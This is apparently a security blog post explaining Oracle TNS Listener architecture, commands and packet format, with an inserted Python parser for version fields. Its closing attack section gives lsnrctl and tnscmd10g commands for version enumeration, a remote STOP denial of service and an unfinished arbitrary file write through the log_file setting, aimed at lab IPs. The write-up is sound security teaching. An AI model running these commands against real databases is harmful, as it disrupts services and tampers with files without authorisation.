THE SPRAWL

    Oracle Listener serves as the main communication point for the database. It provides the necessary abstraction over the host's transport protocols so that Oracle's higher-level session protocols can function across multiple platforms.

    Architecture

    All database clients must first establish a connection with the listener and then wait to be redirected to the database itself. TNS Listener is also used during external procedure calls. TNS Listener is managed by connecting to it locally or remotely (versions prior to 10g) or by editing its configuration files.

    Oracle Listener consists of several important files:

    tnslsnr
    TNS Listener server process.
    listener.ora
    Listener configuration file. Located in ORACLE_HOME/network/admin/.
    sqlnet.ora
    SQL*Net configuration file. Located in ORACLE_HOME/network/admin/.
    tnsnames.ora
    Configuration file listing database addresses. Located in ORACLE_HOME/network/admin/.
    TNS_ADMIN
    Environment variable containing the location of the SQL*Net configuration files above. ORACLE_HOME/network/admin/ by default.
    listener.log
    Contains logs of listener connection attempts, usernames, client programs, etc. Located in ORACLE_HOME/network/log/. NOTE: Connections made through XMLDB's FTP or HTTP ports are not logged.

    Oracle's proprietary TNS (Transparent Network Substrate) protocol is used for client-server communication. This service listens by default on port 1521. It can also use other ports in the range 1522-1540, or a custom port set in listener.ora:

    LISTENER =
      (DESCRIPTION_LIST =
        (DESCRIPTION =
          (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1))
          (ADDRESS = (PROTOCOL = TCP)(HOST = oracle_hostname)(PORT = 1522))
        )
      )

    As we can see from the above configuration snippet, TNS Listener waits for connections coming over the network using the TCP/IP protocol or through a named pipe using IPC.

    Clients

    There are several clients available to communicate with TNS Listener:

    lsnrctl
    Oracle's official listener client. It can be obtained from a server installation in ORACLE_HOME/BIN/. In order to run lsnrctl remotely from a client, install the full Oracle client and copy the lsnrctl executable into the client's ORACLE_HOME/BIN directory.
    tnscmd.pl
    Perl script developed by James W. Abendschan. This client includes additional functionality such as the ability to inject arbitrary raw commands. NOTE: tnscmd10g.pl is an updated version of this program that works with Oracle 10g.
    Oracle TNSLSNR IP Client
    Windows GUI version of tnscmd.pl by DokFLeed.net.
    tnsping
    Used to test the connection to the listener.

    Commands

    We can communicate with the listener by using Oracle's LSNRCTL:

    lsnrctl COMMAND 192.168.1.102
    

    or

    LSNRCTL> set current_listener 192.168.1.102
    Current Listener is 192.168.1.102
    LSNRCTL> COMMAND
    

    tnscmd.pl can also be used when testing from Unix machines:

    ./tnscmd.pl COMMAND -h 192.168.1.102
    

    TNS Listener could be administered remotely before 10g was introduced. Starting with 10g, only VERSION can be queried remotely; the rest of the commands must be executed locally. This is due to the LOCAL_OS_AUTHENTICATION_<listener_name> parameter in the listener.ora configuration file. However, it is still possible to communicate with TNS Listener locally over named pipes.

    VERSION

    Oracle 9i R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.102)(PORT=1521)))
    TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production
            TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
            Windows NT Named Pipes NT Protocol Adapter for 32-bit Windows: Version 9.2.0.1.0 - Production
            Windows NT TCP/IP NT Protocol Adapter for 32-bit Windows: Version 9.2.0.1.0 - Production,,

    Oracle 10g R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.104))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.104)(PORT=1521)))
    TNSLSNR for 32-bit Windows: Version 10.2.0.1.0 - Production
            TNS for 32-bit Windows: Version 10.2.0.1.0 - Production
            Windows NT Named Pipes NT Protocol Adapter for 32-bit Windows: Version 10.2.0.1.0 - Production
            Windows NT TCP/IP NT Protocol Adapter for 32-bit Windows: Version 10.2.0.1.0 - Production,,

    STATUS

    Oracle 9i R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.102)(PORT=1521)))
    STATUS of the LISTENER
    ------------------------
    Alias                     LISTENER
    Version                   TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production
    Start Date                08-FEB-2008 21:03:54
    Uptime                    0 days 0 hr. 38 min. 50 sec
    Trace Level               off
    Security                  OFF
    SNMP                      OFF
    Listener Parameter File   C:\oracle\ora92\network\admin\listener.ora
    Listener Log File         C:\oracle\ora92\network\log\listener.log
    Listening Endpoints Summary...
      (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC0ipc)))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=1521)))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=8080))(Presentation=HTTP)(Session=RAW))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=2100))(Presentation=FTP)(Session=RAW))
    Services Summary...
    Service "ORCL" has 2 instance(s).
      Instance "ORCL", status UNKNOWN, has 1 handler(s) for this service...
      Instance "ORCL", status READY, has 1 handler(s) for this service...
    Service "ORCLXDB" has 1 instance(s).
      Instance "ORCL", status READY, has 1 handler(s) for this service...
    Service "PLSExtProc" has 1 instance(s).
      Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
    

    Oracle 10g R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.104))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.104)(PORT=1521)))
    TNS-01189: The listener could not authenticate the user
    

    SERVICES

    Oracle 9i R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.102)(PORT=1521)))
    Services Summary...
    Service "ORCL" has 2 instance(s).
      Instance "ORCL", status UNKNOWN, has 1 handler(s) for this service...
        Handler(s):
          "DEDICATED" established:0 refused:0
             LOCAL SERVER
      Instance "ORCL", status READY, has 1 handler(s) for this service...
        Handler(s):
          "DEDICATED" established:0 refused:0 state:ready
             LOCAL SERVER
    Service "ORCLXDB" has 1 instance(s).
      Instance "ORCL", status READY, has 1 handler(s) for this service...
        Handler(s):
          "D000" established:0 refused:0 current:0 max:1002 state:ready
             DISPATCHER <machine: ORACLE9I-R2, pid: 244>
             (ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=1033))
    Service "PLSExtProc" has 1 instance(s).
      Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
        Handler(s):
          "DEDICATED" established:0 refused:0
             LOCAL SERVER
    

    Oracle 10g R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.104))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.104)(PORT=1521)))
    TNS-01189: The listener could not authenticate the user
    

    STOP

    WARNING: You will not be able to connect to the listener after successfully issuing this command!

    Oracle 9i R2:

    LSNRCTL> set current_listener 192.168.1.102
    Current Listener is 192.168.1.102
    LSNRCTL> stop
    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.102)(PORT=1521)))
    The command completed successfully
    LSNRCTL> version
    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.102)(PORT=1521)))
    TNS-12541: TNS:no listener
     TNS-12560: TNS:protocol adapter error
      TNS-00511: No listener
       32-bit Windows Error: 61: Unknown error
    

    Oracle 10g R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.104))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.104)(PORT=1521)))
    TNS-01189: The listener could not authenticate the user
    

    START

    NOTE: START can only be executed locally on the system, since a listener that was previously stopped cannot accept any remote connection.

    Oracle 9i R2:

    LSNRCTL> start
    Starting tnslsnr: please wait...
    
    TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production
    System parameter file is C:\oracle\ora92\network\admin\listener.ora
    Log messages written to C:\oracle\ora92\network\log\listener.log
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC0ipc)))
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=1521)))
    
    Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0)))
    
    STATUS of the LISTENER
    ------------------------
    Alias                     LISTENER
    Version                   TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production
    Start Date                09-FEB-2008 21:29:43
    Uptime                    0 days 0 hr. 0 min. 2 sec
    Trace Level               off
    Security                  OFF
    SNMP                      OFF
    Listener Parameter File   C:\oracle\ora92\network\admin\listener.ora
    Listener Log File         C:\oracle\ora92\network\log\listener.log
    Listening Endpoints Summary...
      (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC0ipc)))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=1521)))
    Services Summary...
    Service "ORCL" has 1 instance(s).
      Instance "ORCL", status UNKNOWN, has 1 handler(s) for this service...
    Service "PLSExtProc" has 1 instance(s).
      Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
    The command completed successfully
    

    Oracle 10g R2:

    LSNRCTL> start
    Starting tnslsnr: please wait...
    
    TNSLSNR for 32-bit Windows: Version 10.2.0.1.0 - Production
    System parameter file is C:\oracle\product\10.2.0\db_1\network\admin\listener.ora
    Log messages written to C:\oracle\product\10.2.0\db_1\network\log\listener.log
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC1ipc)))
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.104)(PORT=1521)))
    
    Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC1)))
    
    STATUS of the LISTENER
    ------------------------
    Alias                     LISTENER
    Version                   TNSLSNR for 32-bit Windows: Version 10.2.0.1.0 - Production
    Start Date                09-FEB-2008 21:32:17
    Uptime                    0 days 0 hr. 0 min. 3 sec
    Trace Level               off
    Security                  ON: Local OS Authentication
    SNMP                      OFF
    Listener Parameter File   C:\oracle\product\10.2.0\db_1\network\admin\listener.ora
    Listener Log File         C:\oracle\product\10.2.0\db_1\network\log\listener.log
    
    Listening Endpoints Summary...
      (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC1ipc)))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.104)(PORT=1521)))
    Services Summary...
    Service "PLSExtProc" has 1 instance(s).
      Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
    The command completed successfully
    

    Listener Protocol

    Below is a sample exchange between lsnrctl and tnslsnr to obtain version information:

    Connect

    Immediately after a TCP connection is established between client and server, a TNS Connect packet is sent to the server with the following service request:

    (DESCRIPTION=
       (CONNECT_DATA=
          (CID=
             (PROGRAM=)     <- program name is not supplied by lsnrctl
             (HOST=)        <- database host is not supplied since we connect to the listener only
             (USER=vmware)  <- username on the client machine
          )
          (COMMAND=version) <- command to execute on the listener
          (ARGUMENTS=64)
          (SERVICE=192.168.1.102) <- listener address
          (VERSION=169869568)     <- client lsnrctl version (169869568 is A200100 in hex, which stands for 10.2.0.1)
       )
    )

    Here is a packet capture of this connect packet:

     4   0.000458 192.168.1.108 -> 192.168.1.102 TNS Request, Connect (1), Connect
     0000  00 0c 29 0c 9a c7 00 0c 29 fd 07 3d 08 00 45 00   ..).....)..=..E.
     0010  00 ec 55 99 40 00 80 06 20 50 c0 a8 01 6c c0 a8   ..U.@... P...l..
     0020  01 66 04 55 05 f1 98 08 37 18 2a 0c 4a 2c 50 18   .f.U....7.*.J,P.
     0030  ff ff e6 16 00 00 00 c4 00 00 01 00 00 00 01 39   ...............9
     0040  01 2c 00 81 08 00 7f ff c6 0e 00 00 01 00 00 8a   .,..............
     0050  00 3a 00 00 07 f8 0c 0c 00 00 00 00 00 00 00 00   .:..............
     0060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
     0070  28 44 45 53 43 52 49 50 54 49 4f 4e 3d 28 43 4f   (DESCRIPTION=(CO
     0080  4e 4e 45 43 54 5f 44 41 54 41 3d 28 43 49 44 3d   NNECT_DATA=(CID=
     0090  28 50 52 4f 47 52 41 4d 3d 29 28 48 4f 53 54 3d   (PROGRAM=)(HOST=
     00a0  29 28 55 53 45 52 3d 76 6d 77 61 72 65 29 29 28   )(USER=vmware))(
     00b0  43 4f 4d 4d 41 4e 44 3d 76 65 72 73 69 6f 6e 29   COMMAND=version)
     00c0  28 41 52 47 55 4d 45 4e 54 53 3d 36 34 29 28 53   (ARGUMENTS=64)(S
     00d0  45 52 56 49 43 45 3d 31 39 32 2e 31 36 38 2e 31   ERVICE=192.168.1
     00e0  2e 31 30 32 29 28 56 45 52 53 49 4f 4e 3d 31 36   .102)(VERSION=16
     00f0  39 38 36 39 35 36 38 29 29 29                     9869568)))
    

    The tnscmd.pl client sends a slightly different Connect string, which can be useful for identifying this client:

    (CONNECT_DATA=
       (CID=
          (PROGRAM=)
          (HOST=linux)   <-------
          (USER=oracle)  <-------
       )
       (COMMAND=status)
       (ARGUMENTS=64)
       (SERVICE=LISTENER)
       (VERSION=169869568)
    )
    

    Accept

    If the listener command received is valid, TNS Listener responds with an Accept packet containing the following information:

    (DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0))
    

    One particularly interesting parameter passed back is VSNNUM, the TNS Listener's version number. The decimal value 153092352 is 9200100 in hex, which stands for Oracle version 9.2.0.1.0, as confirmed later. This lets the client check that it can understand the Response packet that follows.

    Here is a packet capture of server's response:

     5   0.001514 192.168.1.102 -> 192.168.1.108 TNS Response, Accept (2), Accept
     0000  00 0c 29 fd 07 3d 00 0c 29 0c 9a c7 08 00 45 00   ..)..=..).....E.
     0010  00 75 46 b8 40 00 80 06 2f a8 c0 a8 01 66 c0 a8   .uF.@.../....f..
     0020  01 6c 05 f1 04 55 2a 0c 4a 2c 98 08 37 dc 50 18   .l...U*.J,..7.P.
     0030  ff 3b 7d 5f 00 00 00 4d 00 00 02 00 00 00 01 38   .;}_...M.......8
     0040  00 01 08 00 7f ff 01 00 00 2d 00 20 0d 0c 00 00   .........-. ....
     0050  00 00 00 00 00 00 28 44 45 53 43 52 49 50 54 49   ......(DESCRIPTI
     0060  4f 4e 3d 28 54 4d 50 3d 29 28 56 53 4e 4e 55 4d   ON=(TMP=)(VSNNUM
     0070  3d 31 35 33 30 39 32 33 35 32 29 28 45 52 52 3d   =153092352)(ERR=
     0080  30 29 29                                          0))
    

    Data

    The response will be sent in a data packet with the following content:

    TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production
    TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
    Windows NT Named Pipes NT Protocol Adapter for 32-bit Windows: Version 9.2.0.1.0 - Production
    Windows NT TCP/IP NT Protocol Adapter for 32-bit Windows: Version 9.2.0.1.0 - Production,,
    

    Here is a capture of the response:

     6   0.001647 192.168.1.102 -> 192.168.1.108 TNS Response, Data (6), Data
     0000  00 0c 29 fd 07 3d 00 0c 29 0c 9a c7 08 00 45 00   ..)..=..).....E.
     0010  01 5f 46 b9 40 00 80 06 2e bd c0 a8 01 66 c0 a8   ._F.@........f..
     0020  01 6c 05 f1 04 55 2a 0c 4a 79 98 08 37 dc 50 18   .l...U*.Jy..7.P.
     0030  ff 3b 11 55 00 00 01 37 00 00 06 00 00 00 00 00   .;.U...7........
     0040  54 4e 53 4c 53 4e 52 20 66 6f 72 20 33 32 2d 62   TNSLSNR for 32-b
     0050  69 74 20 57 69 6e 64 6f 77 73 3a 20 56 65 72 73   it Windows: Vers
     0060  69 6f 6e 20 39 2e 32 2e 30 2e 31 2e 30 20 2d 20   ion 9.2.0.1.0 -
     0070  50 72 6f 64 75 63 74 69 6f 6e 0a 09 54 4e 53 20   Production..TNS
     0080  66 6f 72 20 33 32 2d 62 69 74 20 57 69 6e 64 6f   for 32-bit Windo
     0090  77 73 3a 20 56 65 72 73 69 6f 6e 20 39 2e 32 2e   ws: Version 9.2.
     00a0  30 2e 31 2e 30 20 2d 20 50 72 6f 64 75 63 74 69   0.1.0 - Producti
     00b0  6f 6e 0a 09 57 69 6e 64 6f 77 73 20 4e 54 20 4e   on..Windows NT N
     00c0  61 6d 65 64 20 50 69 70 65 73 20 4e 54 20 50 72   amed Pipes NT Pr
     00d0  6f 74 6f 63 6f 6c 20 41 64 61 70 74 65 72 20 66   otocol Adapter f
     00e0  6f 72 20 33 32 2d 62 69 74 20 57 69 6e 64 6f 77   or 32-bit Window
     00f0  73 3a 20 56 65 72 73 69 6f 6e 20 39 2e 32 2e 30   s: Version 9.2.0
     0100  2e 31 2e 30 20 2d 20 50 72 6f 64 75 63 74 69 6f   .1.0 - Productio
     0110  6e 0a 09 57 69 6e 64 6f 77 73 20 4e 54 20 54 43   n..Windows NT TC
     0120  50 2f 49 50 20 4e 54 20 50 72 6f 74 6f 63 6f 6c   P/IP NT Protocol
     0130  20 41 64 61 70 74 65 72 20 66 6f 72 20 33 32 2d    Adapter for 32-
     0140  62 69 74 20 57 69 6e 64 6f 77 73 3a 20 56 65 72   bit Windows: Ver
     0150  73 69 6f 6e 20 39 2e 32 2e 30 2e 31 2e 30 20 2d   sion 9.2.0.1.0 -
     0160  20 50 72 6f 64 75 63 74 69 6f 6e 2c 2c             Production,,
    

    After all data has been sent, the server notifies the client by sending another Data packet with the End of File flag set:

     7   0.001690 192.168.1.108 -> 192.168.1.102 TCP 1109 > 1521 [ACK] Seq=197 Ack=389 Win=65147 Len=0
     0000  00 0c 29 0c 9a c7 00 0c 29 fd 07 3d 08 00 45 00   ..).....)..=..E.
     0010  00 28 55 9a 40 00 80 06 21 13 c0 a8 01 6c c0 a8   .(U.@...!....l..
     0020  01 66 04 55 05 f1 98 08 37 dc 2a 0c 4b b0 50 10   .f.U....7.*.K.P.
     0030  fe 7b dd 4e 00 00                                 .{.N..
    
     8   0.015022 192.168.1.102 -> 192.168.1.108 TNS Response, Data (6), Data
     0000  00 0c 29 fd 07 3d 00 0c 29 0c 9a c7 08 00 45 00   ..)..=..).....E.
     0010  00 32 46 ba 40 00 80 06 2f e9 c0 a8 01 66 c0 a8   .2F.@.../....f..
     0020  01 6c 05 f1 04 55 2a 0c 4b b0 98 08 37 dc 50 18   .l...U*.K...7.P.
     0030  ff 3b d6 32 00 00 00 0a 00 00 06 00 00 00 00 40   .;.2...........@
    

    Attacks on TNS Listener

    Version Enumeration

    VERSION

    The listener VERSION command can be used to obtain exact version information of the Oracle database:

    lsnrctl version 192.168.1.102
    

    or

    tnscmd10g.pl version -h 192.168.1.102
    

    VSNNUM

    If the first approach fails, we can still deduce the version from the VSNNUM parameter in the error information returned by the listener:

     192.168.1.102  192.168.1.108   TNS Response, Refuse (4), Refuse
     0000   00 0c 29 fd 07 3d 00 0c 29 0c 9a c7 08 00 45 00  ..)..=..).....E.
     0010   00 8f 53 e2 40 00 80 06 22 64 c0 a8 01 66 c0 a8  ..S.@..."d...f..
     0020   01 6c 05 f1 04 0d e8 a0 2d 2b 67 0d 99 85 50 18  .l......-+g...P.
     0030   fe ff 59 03 00 00 00 67 00 00 04 00 00 00 22 00  ..Y....g......".
     0040   00 5b 28 44 45 53 43 52 49 50 54 49 4f 4e 3d 28  .[(DESCRIPTION=(
     0050   54 4d 50 3d 29 28 56 53 4e 4e 55 4d 3d 31 35 33  TMP=)(VSNNUM=153
     0060   30 39 32 33 35 32 29 28 45 52 52 3d 31 32 35 31  092352)(ERR=1251
     0070   34 29 28 45 52 52 4f 52 5f 53 54 41 43 4b 3d 28  4)(ERROR_STACK=(
     0080   45 52 52 4f 52 3d 28 43 4f 44 45 3d 31 32 35 31  ERROR=(CODE=1251
     0090   34 29 28 45 4d 46 49 3d 34 29 29 29 29           4)(EMFI=4))))
    

    Converting the decimal value stored in VSNNUM to hex gives the listener's version number. In this case 153092352 is 9200100 in hex, which stands for Oracle 9.2.0.1.0. As another example, VSNNUM=185599488 is B100600 in hex, which stands for Oracle 11.1.0.6.0.

    Connect/Accept

    The client version number can be enumerated by analyzing the Connect packet:

     0000   00 0c 29 fd 07 3d 00 0c 29 b9 9e e9 08 00 45 00  ..)..=..).....E.
     0010   01 04 bd ab 40 00 40 06 f7 b8 c0 a8 01 d3 c0 a8  ....@.@.........
     0020   01 6c 76 72 05 f1 df 11 4d 70 c1 51 f7 12 80 18  .lvr....Mp.Q....
     0030   00 2e 6b 95 00 00 01 01 08 0a 00 4a fc 86 00 00  ..k........J....
     0040   00 00 00 d0 00 00 01 00 00 00 01 3a 01 2c 00 81  ...........:.,..
     0050   20 00 7f ff 7f 08 00 00 01 00 00 96 00 3a 00 00   ............:..
     0060   07 f8 0c 0c 00 00 00 00 00 00 00 00 00 00 00 00  ................
     0070   00 00 00 00 00 00 00 00 00 00 00 00 28 44 45 53  ............(DES
     0080   43 52 49 50 54 49 4f 4e 3d 28 43 4f 4e 4e 45 43  CRIPTION=(CONNEC
     0090   54 5f 44 41 54 41 3d 28 43 49 44 3d 28 50 52 4f  T_DATA=(CID=(PRO
     00a0   47 52 41 4d 3d 29 28 48 4f 53 54 3d 66 38 2e 74  GRAM=)(HOST=f8.t
     00b0   68 65 73 70 72 61 77 6c 29 28 55 53 45 52 3d 6f  hesprawl)(USER=o
     00c0   72 61 63 6c 65 29 29 28 43 4f 4d 4d 41 4e 44 3d  racle))(COMMAND=
     00d0   76 65 72 73 69 6f 6e 29 28 41 52 47 55 4d 45 4e  version)(ARGUMEN
     00e0   54 53 3d 36 34 29 28 53 45 52 56 49 43 45 3d 31  TS=64)(SERVICE=1
     00f0   39 32 2e 31 36 38 2e 31 2e 31 30 38 29 28 56 45  92.168.1.108)(VE
     0100   52 53 49 4f 4e 3d 31 38 35 35 39 39 34 38 38 29  RSION=185599488)
     0110   29 29                                            ))
    

    The 9th and 10th bytes of the TNS packet contain the encoded version number of the client. These IDs can be decoded as follows:

    ID      Version
    0x136   Oracle 8
    0x137   Oracle 9i R1
    0x138   Oracle 9i R2
    0x139   Oracle 10g R1/R2
    0x13a   Oracle 11g R1

    Similar information can be obtained about the server from the Accept packet:

     0000  00 0c 29 fd 07 3d 00 0c 29 0c 9a c7 08 00 45 00   ..)..=..).....E.
     0010  00 48 7c cf 40 00 80 06 f9 bd c0 a8 01 66 c0 a8   .H|.@........f..
     0020  01 6c 11 d9 04 67 b6 88 7a 22 0e a7 cb 81 50 18   .l...g..z"....P.
     0030  ff 01 1d 97 00 00 00 20 00 00 02 04 00 00 01 38   ....... .......8
     0040  00 00 08 00 7f ff 01 00 00 00 00 20 61 61 00 00   ........... aa..
     0050  00 00 00 00 00 00                                 ......
    

    According to the table above, the server version that sent this packet is Oracle 9i R2 (0x138).
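    The two decodes described above, VSNNUM/VERSION to a dotted Oracle version and the header version ID in bytes 9-10, as an added Python example (not code from the original post): it parses the TNS header of the Connect, Accept and Refuse packets captured on this page, pulls out the NV string and decodes the version fields. The header bytes and NV strings are transcribed from the hex dumps above; the positions of the data-length/offset fields inside the Connect and Accept headers are taken from the TNS header layout, which the page does not spell out.

```python
import re

# TNS packet types seen in the captures on this page.
TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE = 1, 2, 4

# Header version IDs carried in bytes 9-10 of Connect/Accept packets (table above).
HEADER_VERSION_IDS = {0x136: "Oracle 8", 0x137: "Oracle 9i R1", 0x138: "Oracle 9i R2",
                      0x139: "Oracle 10g R1/R2", 0x13a: "Oracle 11g R1"}


def decode_vsnnum(vsnnum: int) -> str:
    """Turn a decimal VSNNUM (server) or VERSION (client) value into a dotted Oracle
    version: 153092352 == 0x09200100 -> 9.2.0.1.0. The hex digits split as
    major (8 bits) . release (4) . update (8) . port (4) . patch (8)."""
    return "{}.{}.{}.{}.{}".format(vsnnum >> 24, (vsnnum >> 20) & 0xF,
                                   (vsnnum >> 12) & 0xFF, (vsnnum >> 8) & 0xF,
                                   vsnnum & 0xFF)


def parse_nv_string(nv: str) -> dict:
    """Collect the leaf KEY=VALUE pairs of an NV string such as
    (DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)); nesting is flattened, which is
    enough to look up VSNNUM, ERR, COMMAND or VERSION."""
    return dict(re.findall(r"\(([A-Z_]+)=([^()]*)\)", nv))


def parse_tns(packet: bytes) -> dict:
    """Parse the 8-byte TNS header, locate the NV string and decode the version
    information of Connect, Accept and Refuse packets."""
    if len(packet) < 8:
        raise ValueError("truncated TNS header")
    length = int.from_bytes(packet[0:2], "big")
    if length != len(packet):
        raise ValueError(f"length field {length} does not match {len(packet)} bytes")
    ptype = packet[4]
    info = {"type": ptype}
    if ptype in (TNS_CONNECT, TNS_ACCEPT):
        vid = int.from_bytes(packet[8:10], "big")  # bytes 9-10, counting from 1
        info["header_version"] = vid
        info["header_version_name"] = HEADER_VERSION_IDS.get(vid, "unknown")
        # Data length/offset fields sit at 24/26 in Connect and 18/20 in Accept
        # (positions taken from the TNS header layout, which the page does not spell out).
        at = 24 if ptype == TNS_CONNECT else 18
        data_len = int.from_bytes(packet[at:at + 2], "big")
        data_off = int.from_bytes(packet[at + 2:at + 4], "big")
    elif ptype == TNS_REFUSE:
        # Refuse: user reason (1), system reason (1), data length (2), then the NV string.
        data_len = int.from_bytes(packet[10:12], "big")
        data_off = 12
    else:
        raise ValueError(f"unsupported TNS packet type {ptype}")
    if data_off + data_len > len(packet):
        raise ValueError("NV string runs past the end of the packet")
    nv = packet[data_off:data_off + data_len].decode("ascii", errors="replace")
    info["nv"] = parse_nv_string(nv)
    # VSNNUM (server, in Accept/Refuse) and VERSION (client, in Connect) decode alike.
    for key in ("VSNNUM", "VERSION"):
        if info["nv"].get(key, "").isdigit():
            info["oracle_version"] = decode_vsnnum(int(info["nv"][key]))
    if info["nv"].get("ERR", "").isdigit():
        info["err"] = int(info["nv"]["ERR"])
    return info


def _tns(header_hex: str, nv: str) -> bytes:
    return bytes.fromhex(header_hex) + nv.encode("ascii")

# TNS portions of frames 4 and 5 above and of the Refuse packet from the VSNNUM section
# (header bytes and NV strings transcribed from the hex dumps, IP/TCP headers dropped).
CONNECT_PACKET = _tns(
    "00c40000010000000139012c008108007fffc60e00000100008a003a000007f80c0c" + "00" * 24,
    "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=vmware))(COMMAND=version)"
    "(ARGUMENTS=64)(SERVICE=192.168.1.102)(VERSION=169869568)))")
ACCEPT_PACKET = _tns("004d0000020000000138000108007fff0100002d00200d0c" + "00" * 8,
                     "(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0))")
REFUSE_PACKET = _tns("00670000040000002200005b",
                     "(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=12514)"
                     "(ERROR_STACK=(ERROR=(CODE=12514)(EMFI=4))))")

if __name__ == "__main__":
    for name, pkt in (("Connect", CONNECT_PACKET), ("Accept", ACCEPT_PACKET),
                      ("Refuse", REFUSE_PACKET)):
        print(name, parse_tns(pkt))
```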


    Denial of Service

    Unprotected Listener versions up to 9i R2 can be remotely stopped with the STOP command, preventing any further database logins.

    lsnrctl stop 192.168.1.102
    

    or

    tnscmd10g.pl stop -h 192.168.1.102
    

    Writing to Arbitrary Files

    Unprotected Listener versions up to 9i R2 can be remotely manipulated to write to an arbitrary file by changing the log file name and then writing data into it by sending raw commands to the listener.

    First, let's learn about Oracle's directory structure by issuing the STATUS command.

     tnscmd10g.pl status -h 192.168.1.102 --indent
     sending (CONNECT_DATA=(COMMAND=status)) to 192.168.1.102:1521
     writing 89 bytes
     reading
     . .......6.........P. ...........Z........
      DESCRIPTION=
        TMP=  
        VSNNUM=153092352  
        ERR=0  
        ALIAS=LISTENER  
        SECURITY=OFF  
        VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production  
        START_DATE=09-FEB-2008 13:32:16  
        SIDNUM=1
        LOGFILE=C:\oracle\ora92\network\log\listener.log
        PRMFILE=C:\oracle\ora92\network\admin\listener.ora
        TRACING=off  
        UPTIME=753082  
        SNMP=OFF  
        PID=1376
     ...
    

    Now we know the path to ORACLE_HOME is C:\oracle\ora92. The next step is to change the log file location to an arbitrary file, such as the SQL*Plus startup file glogin.sql:

     LSNRCTL> set current_listener 192.168.1.102
     Current Listener is 192.168.1.102
     LSNRCTL> set log_file "C:\oracle\ora92\sqlplus\admin\glogin.sql"
     Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(PROTOCOL=TCP)
     (HOST=192.168.1.102)(PORT=1521)))
     192.168.1.102 parameter "log_file" set to C:\oracle\ora92\sqlplus\admin\glogin.sql
     The command completed successfully
    

    or using tnscmd10g:

     tnscmd10g.pl --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=vmware))
     (COMMAND=log_file)(ARGUMENTS=4)(SERVICE=192.168.1.102)(VERSION=169869568)
     (VALUE=C:\oracle\ora92\sqlplus\admin\glogin.sql)))" -h 192.168.1.102
     sending (DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=vmware))
     (COMMAND=log_file)(ARGUMENTS=4)(SERVICE=192.168.1.102)(VERSION=169869568)
     (VALUE=C:\oracle\ora92\sqlplus\admin\glogin.sql))) to 192.168.1.102:1521
     writing 244 bytes
     reading
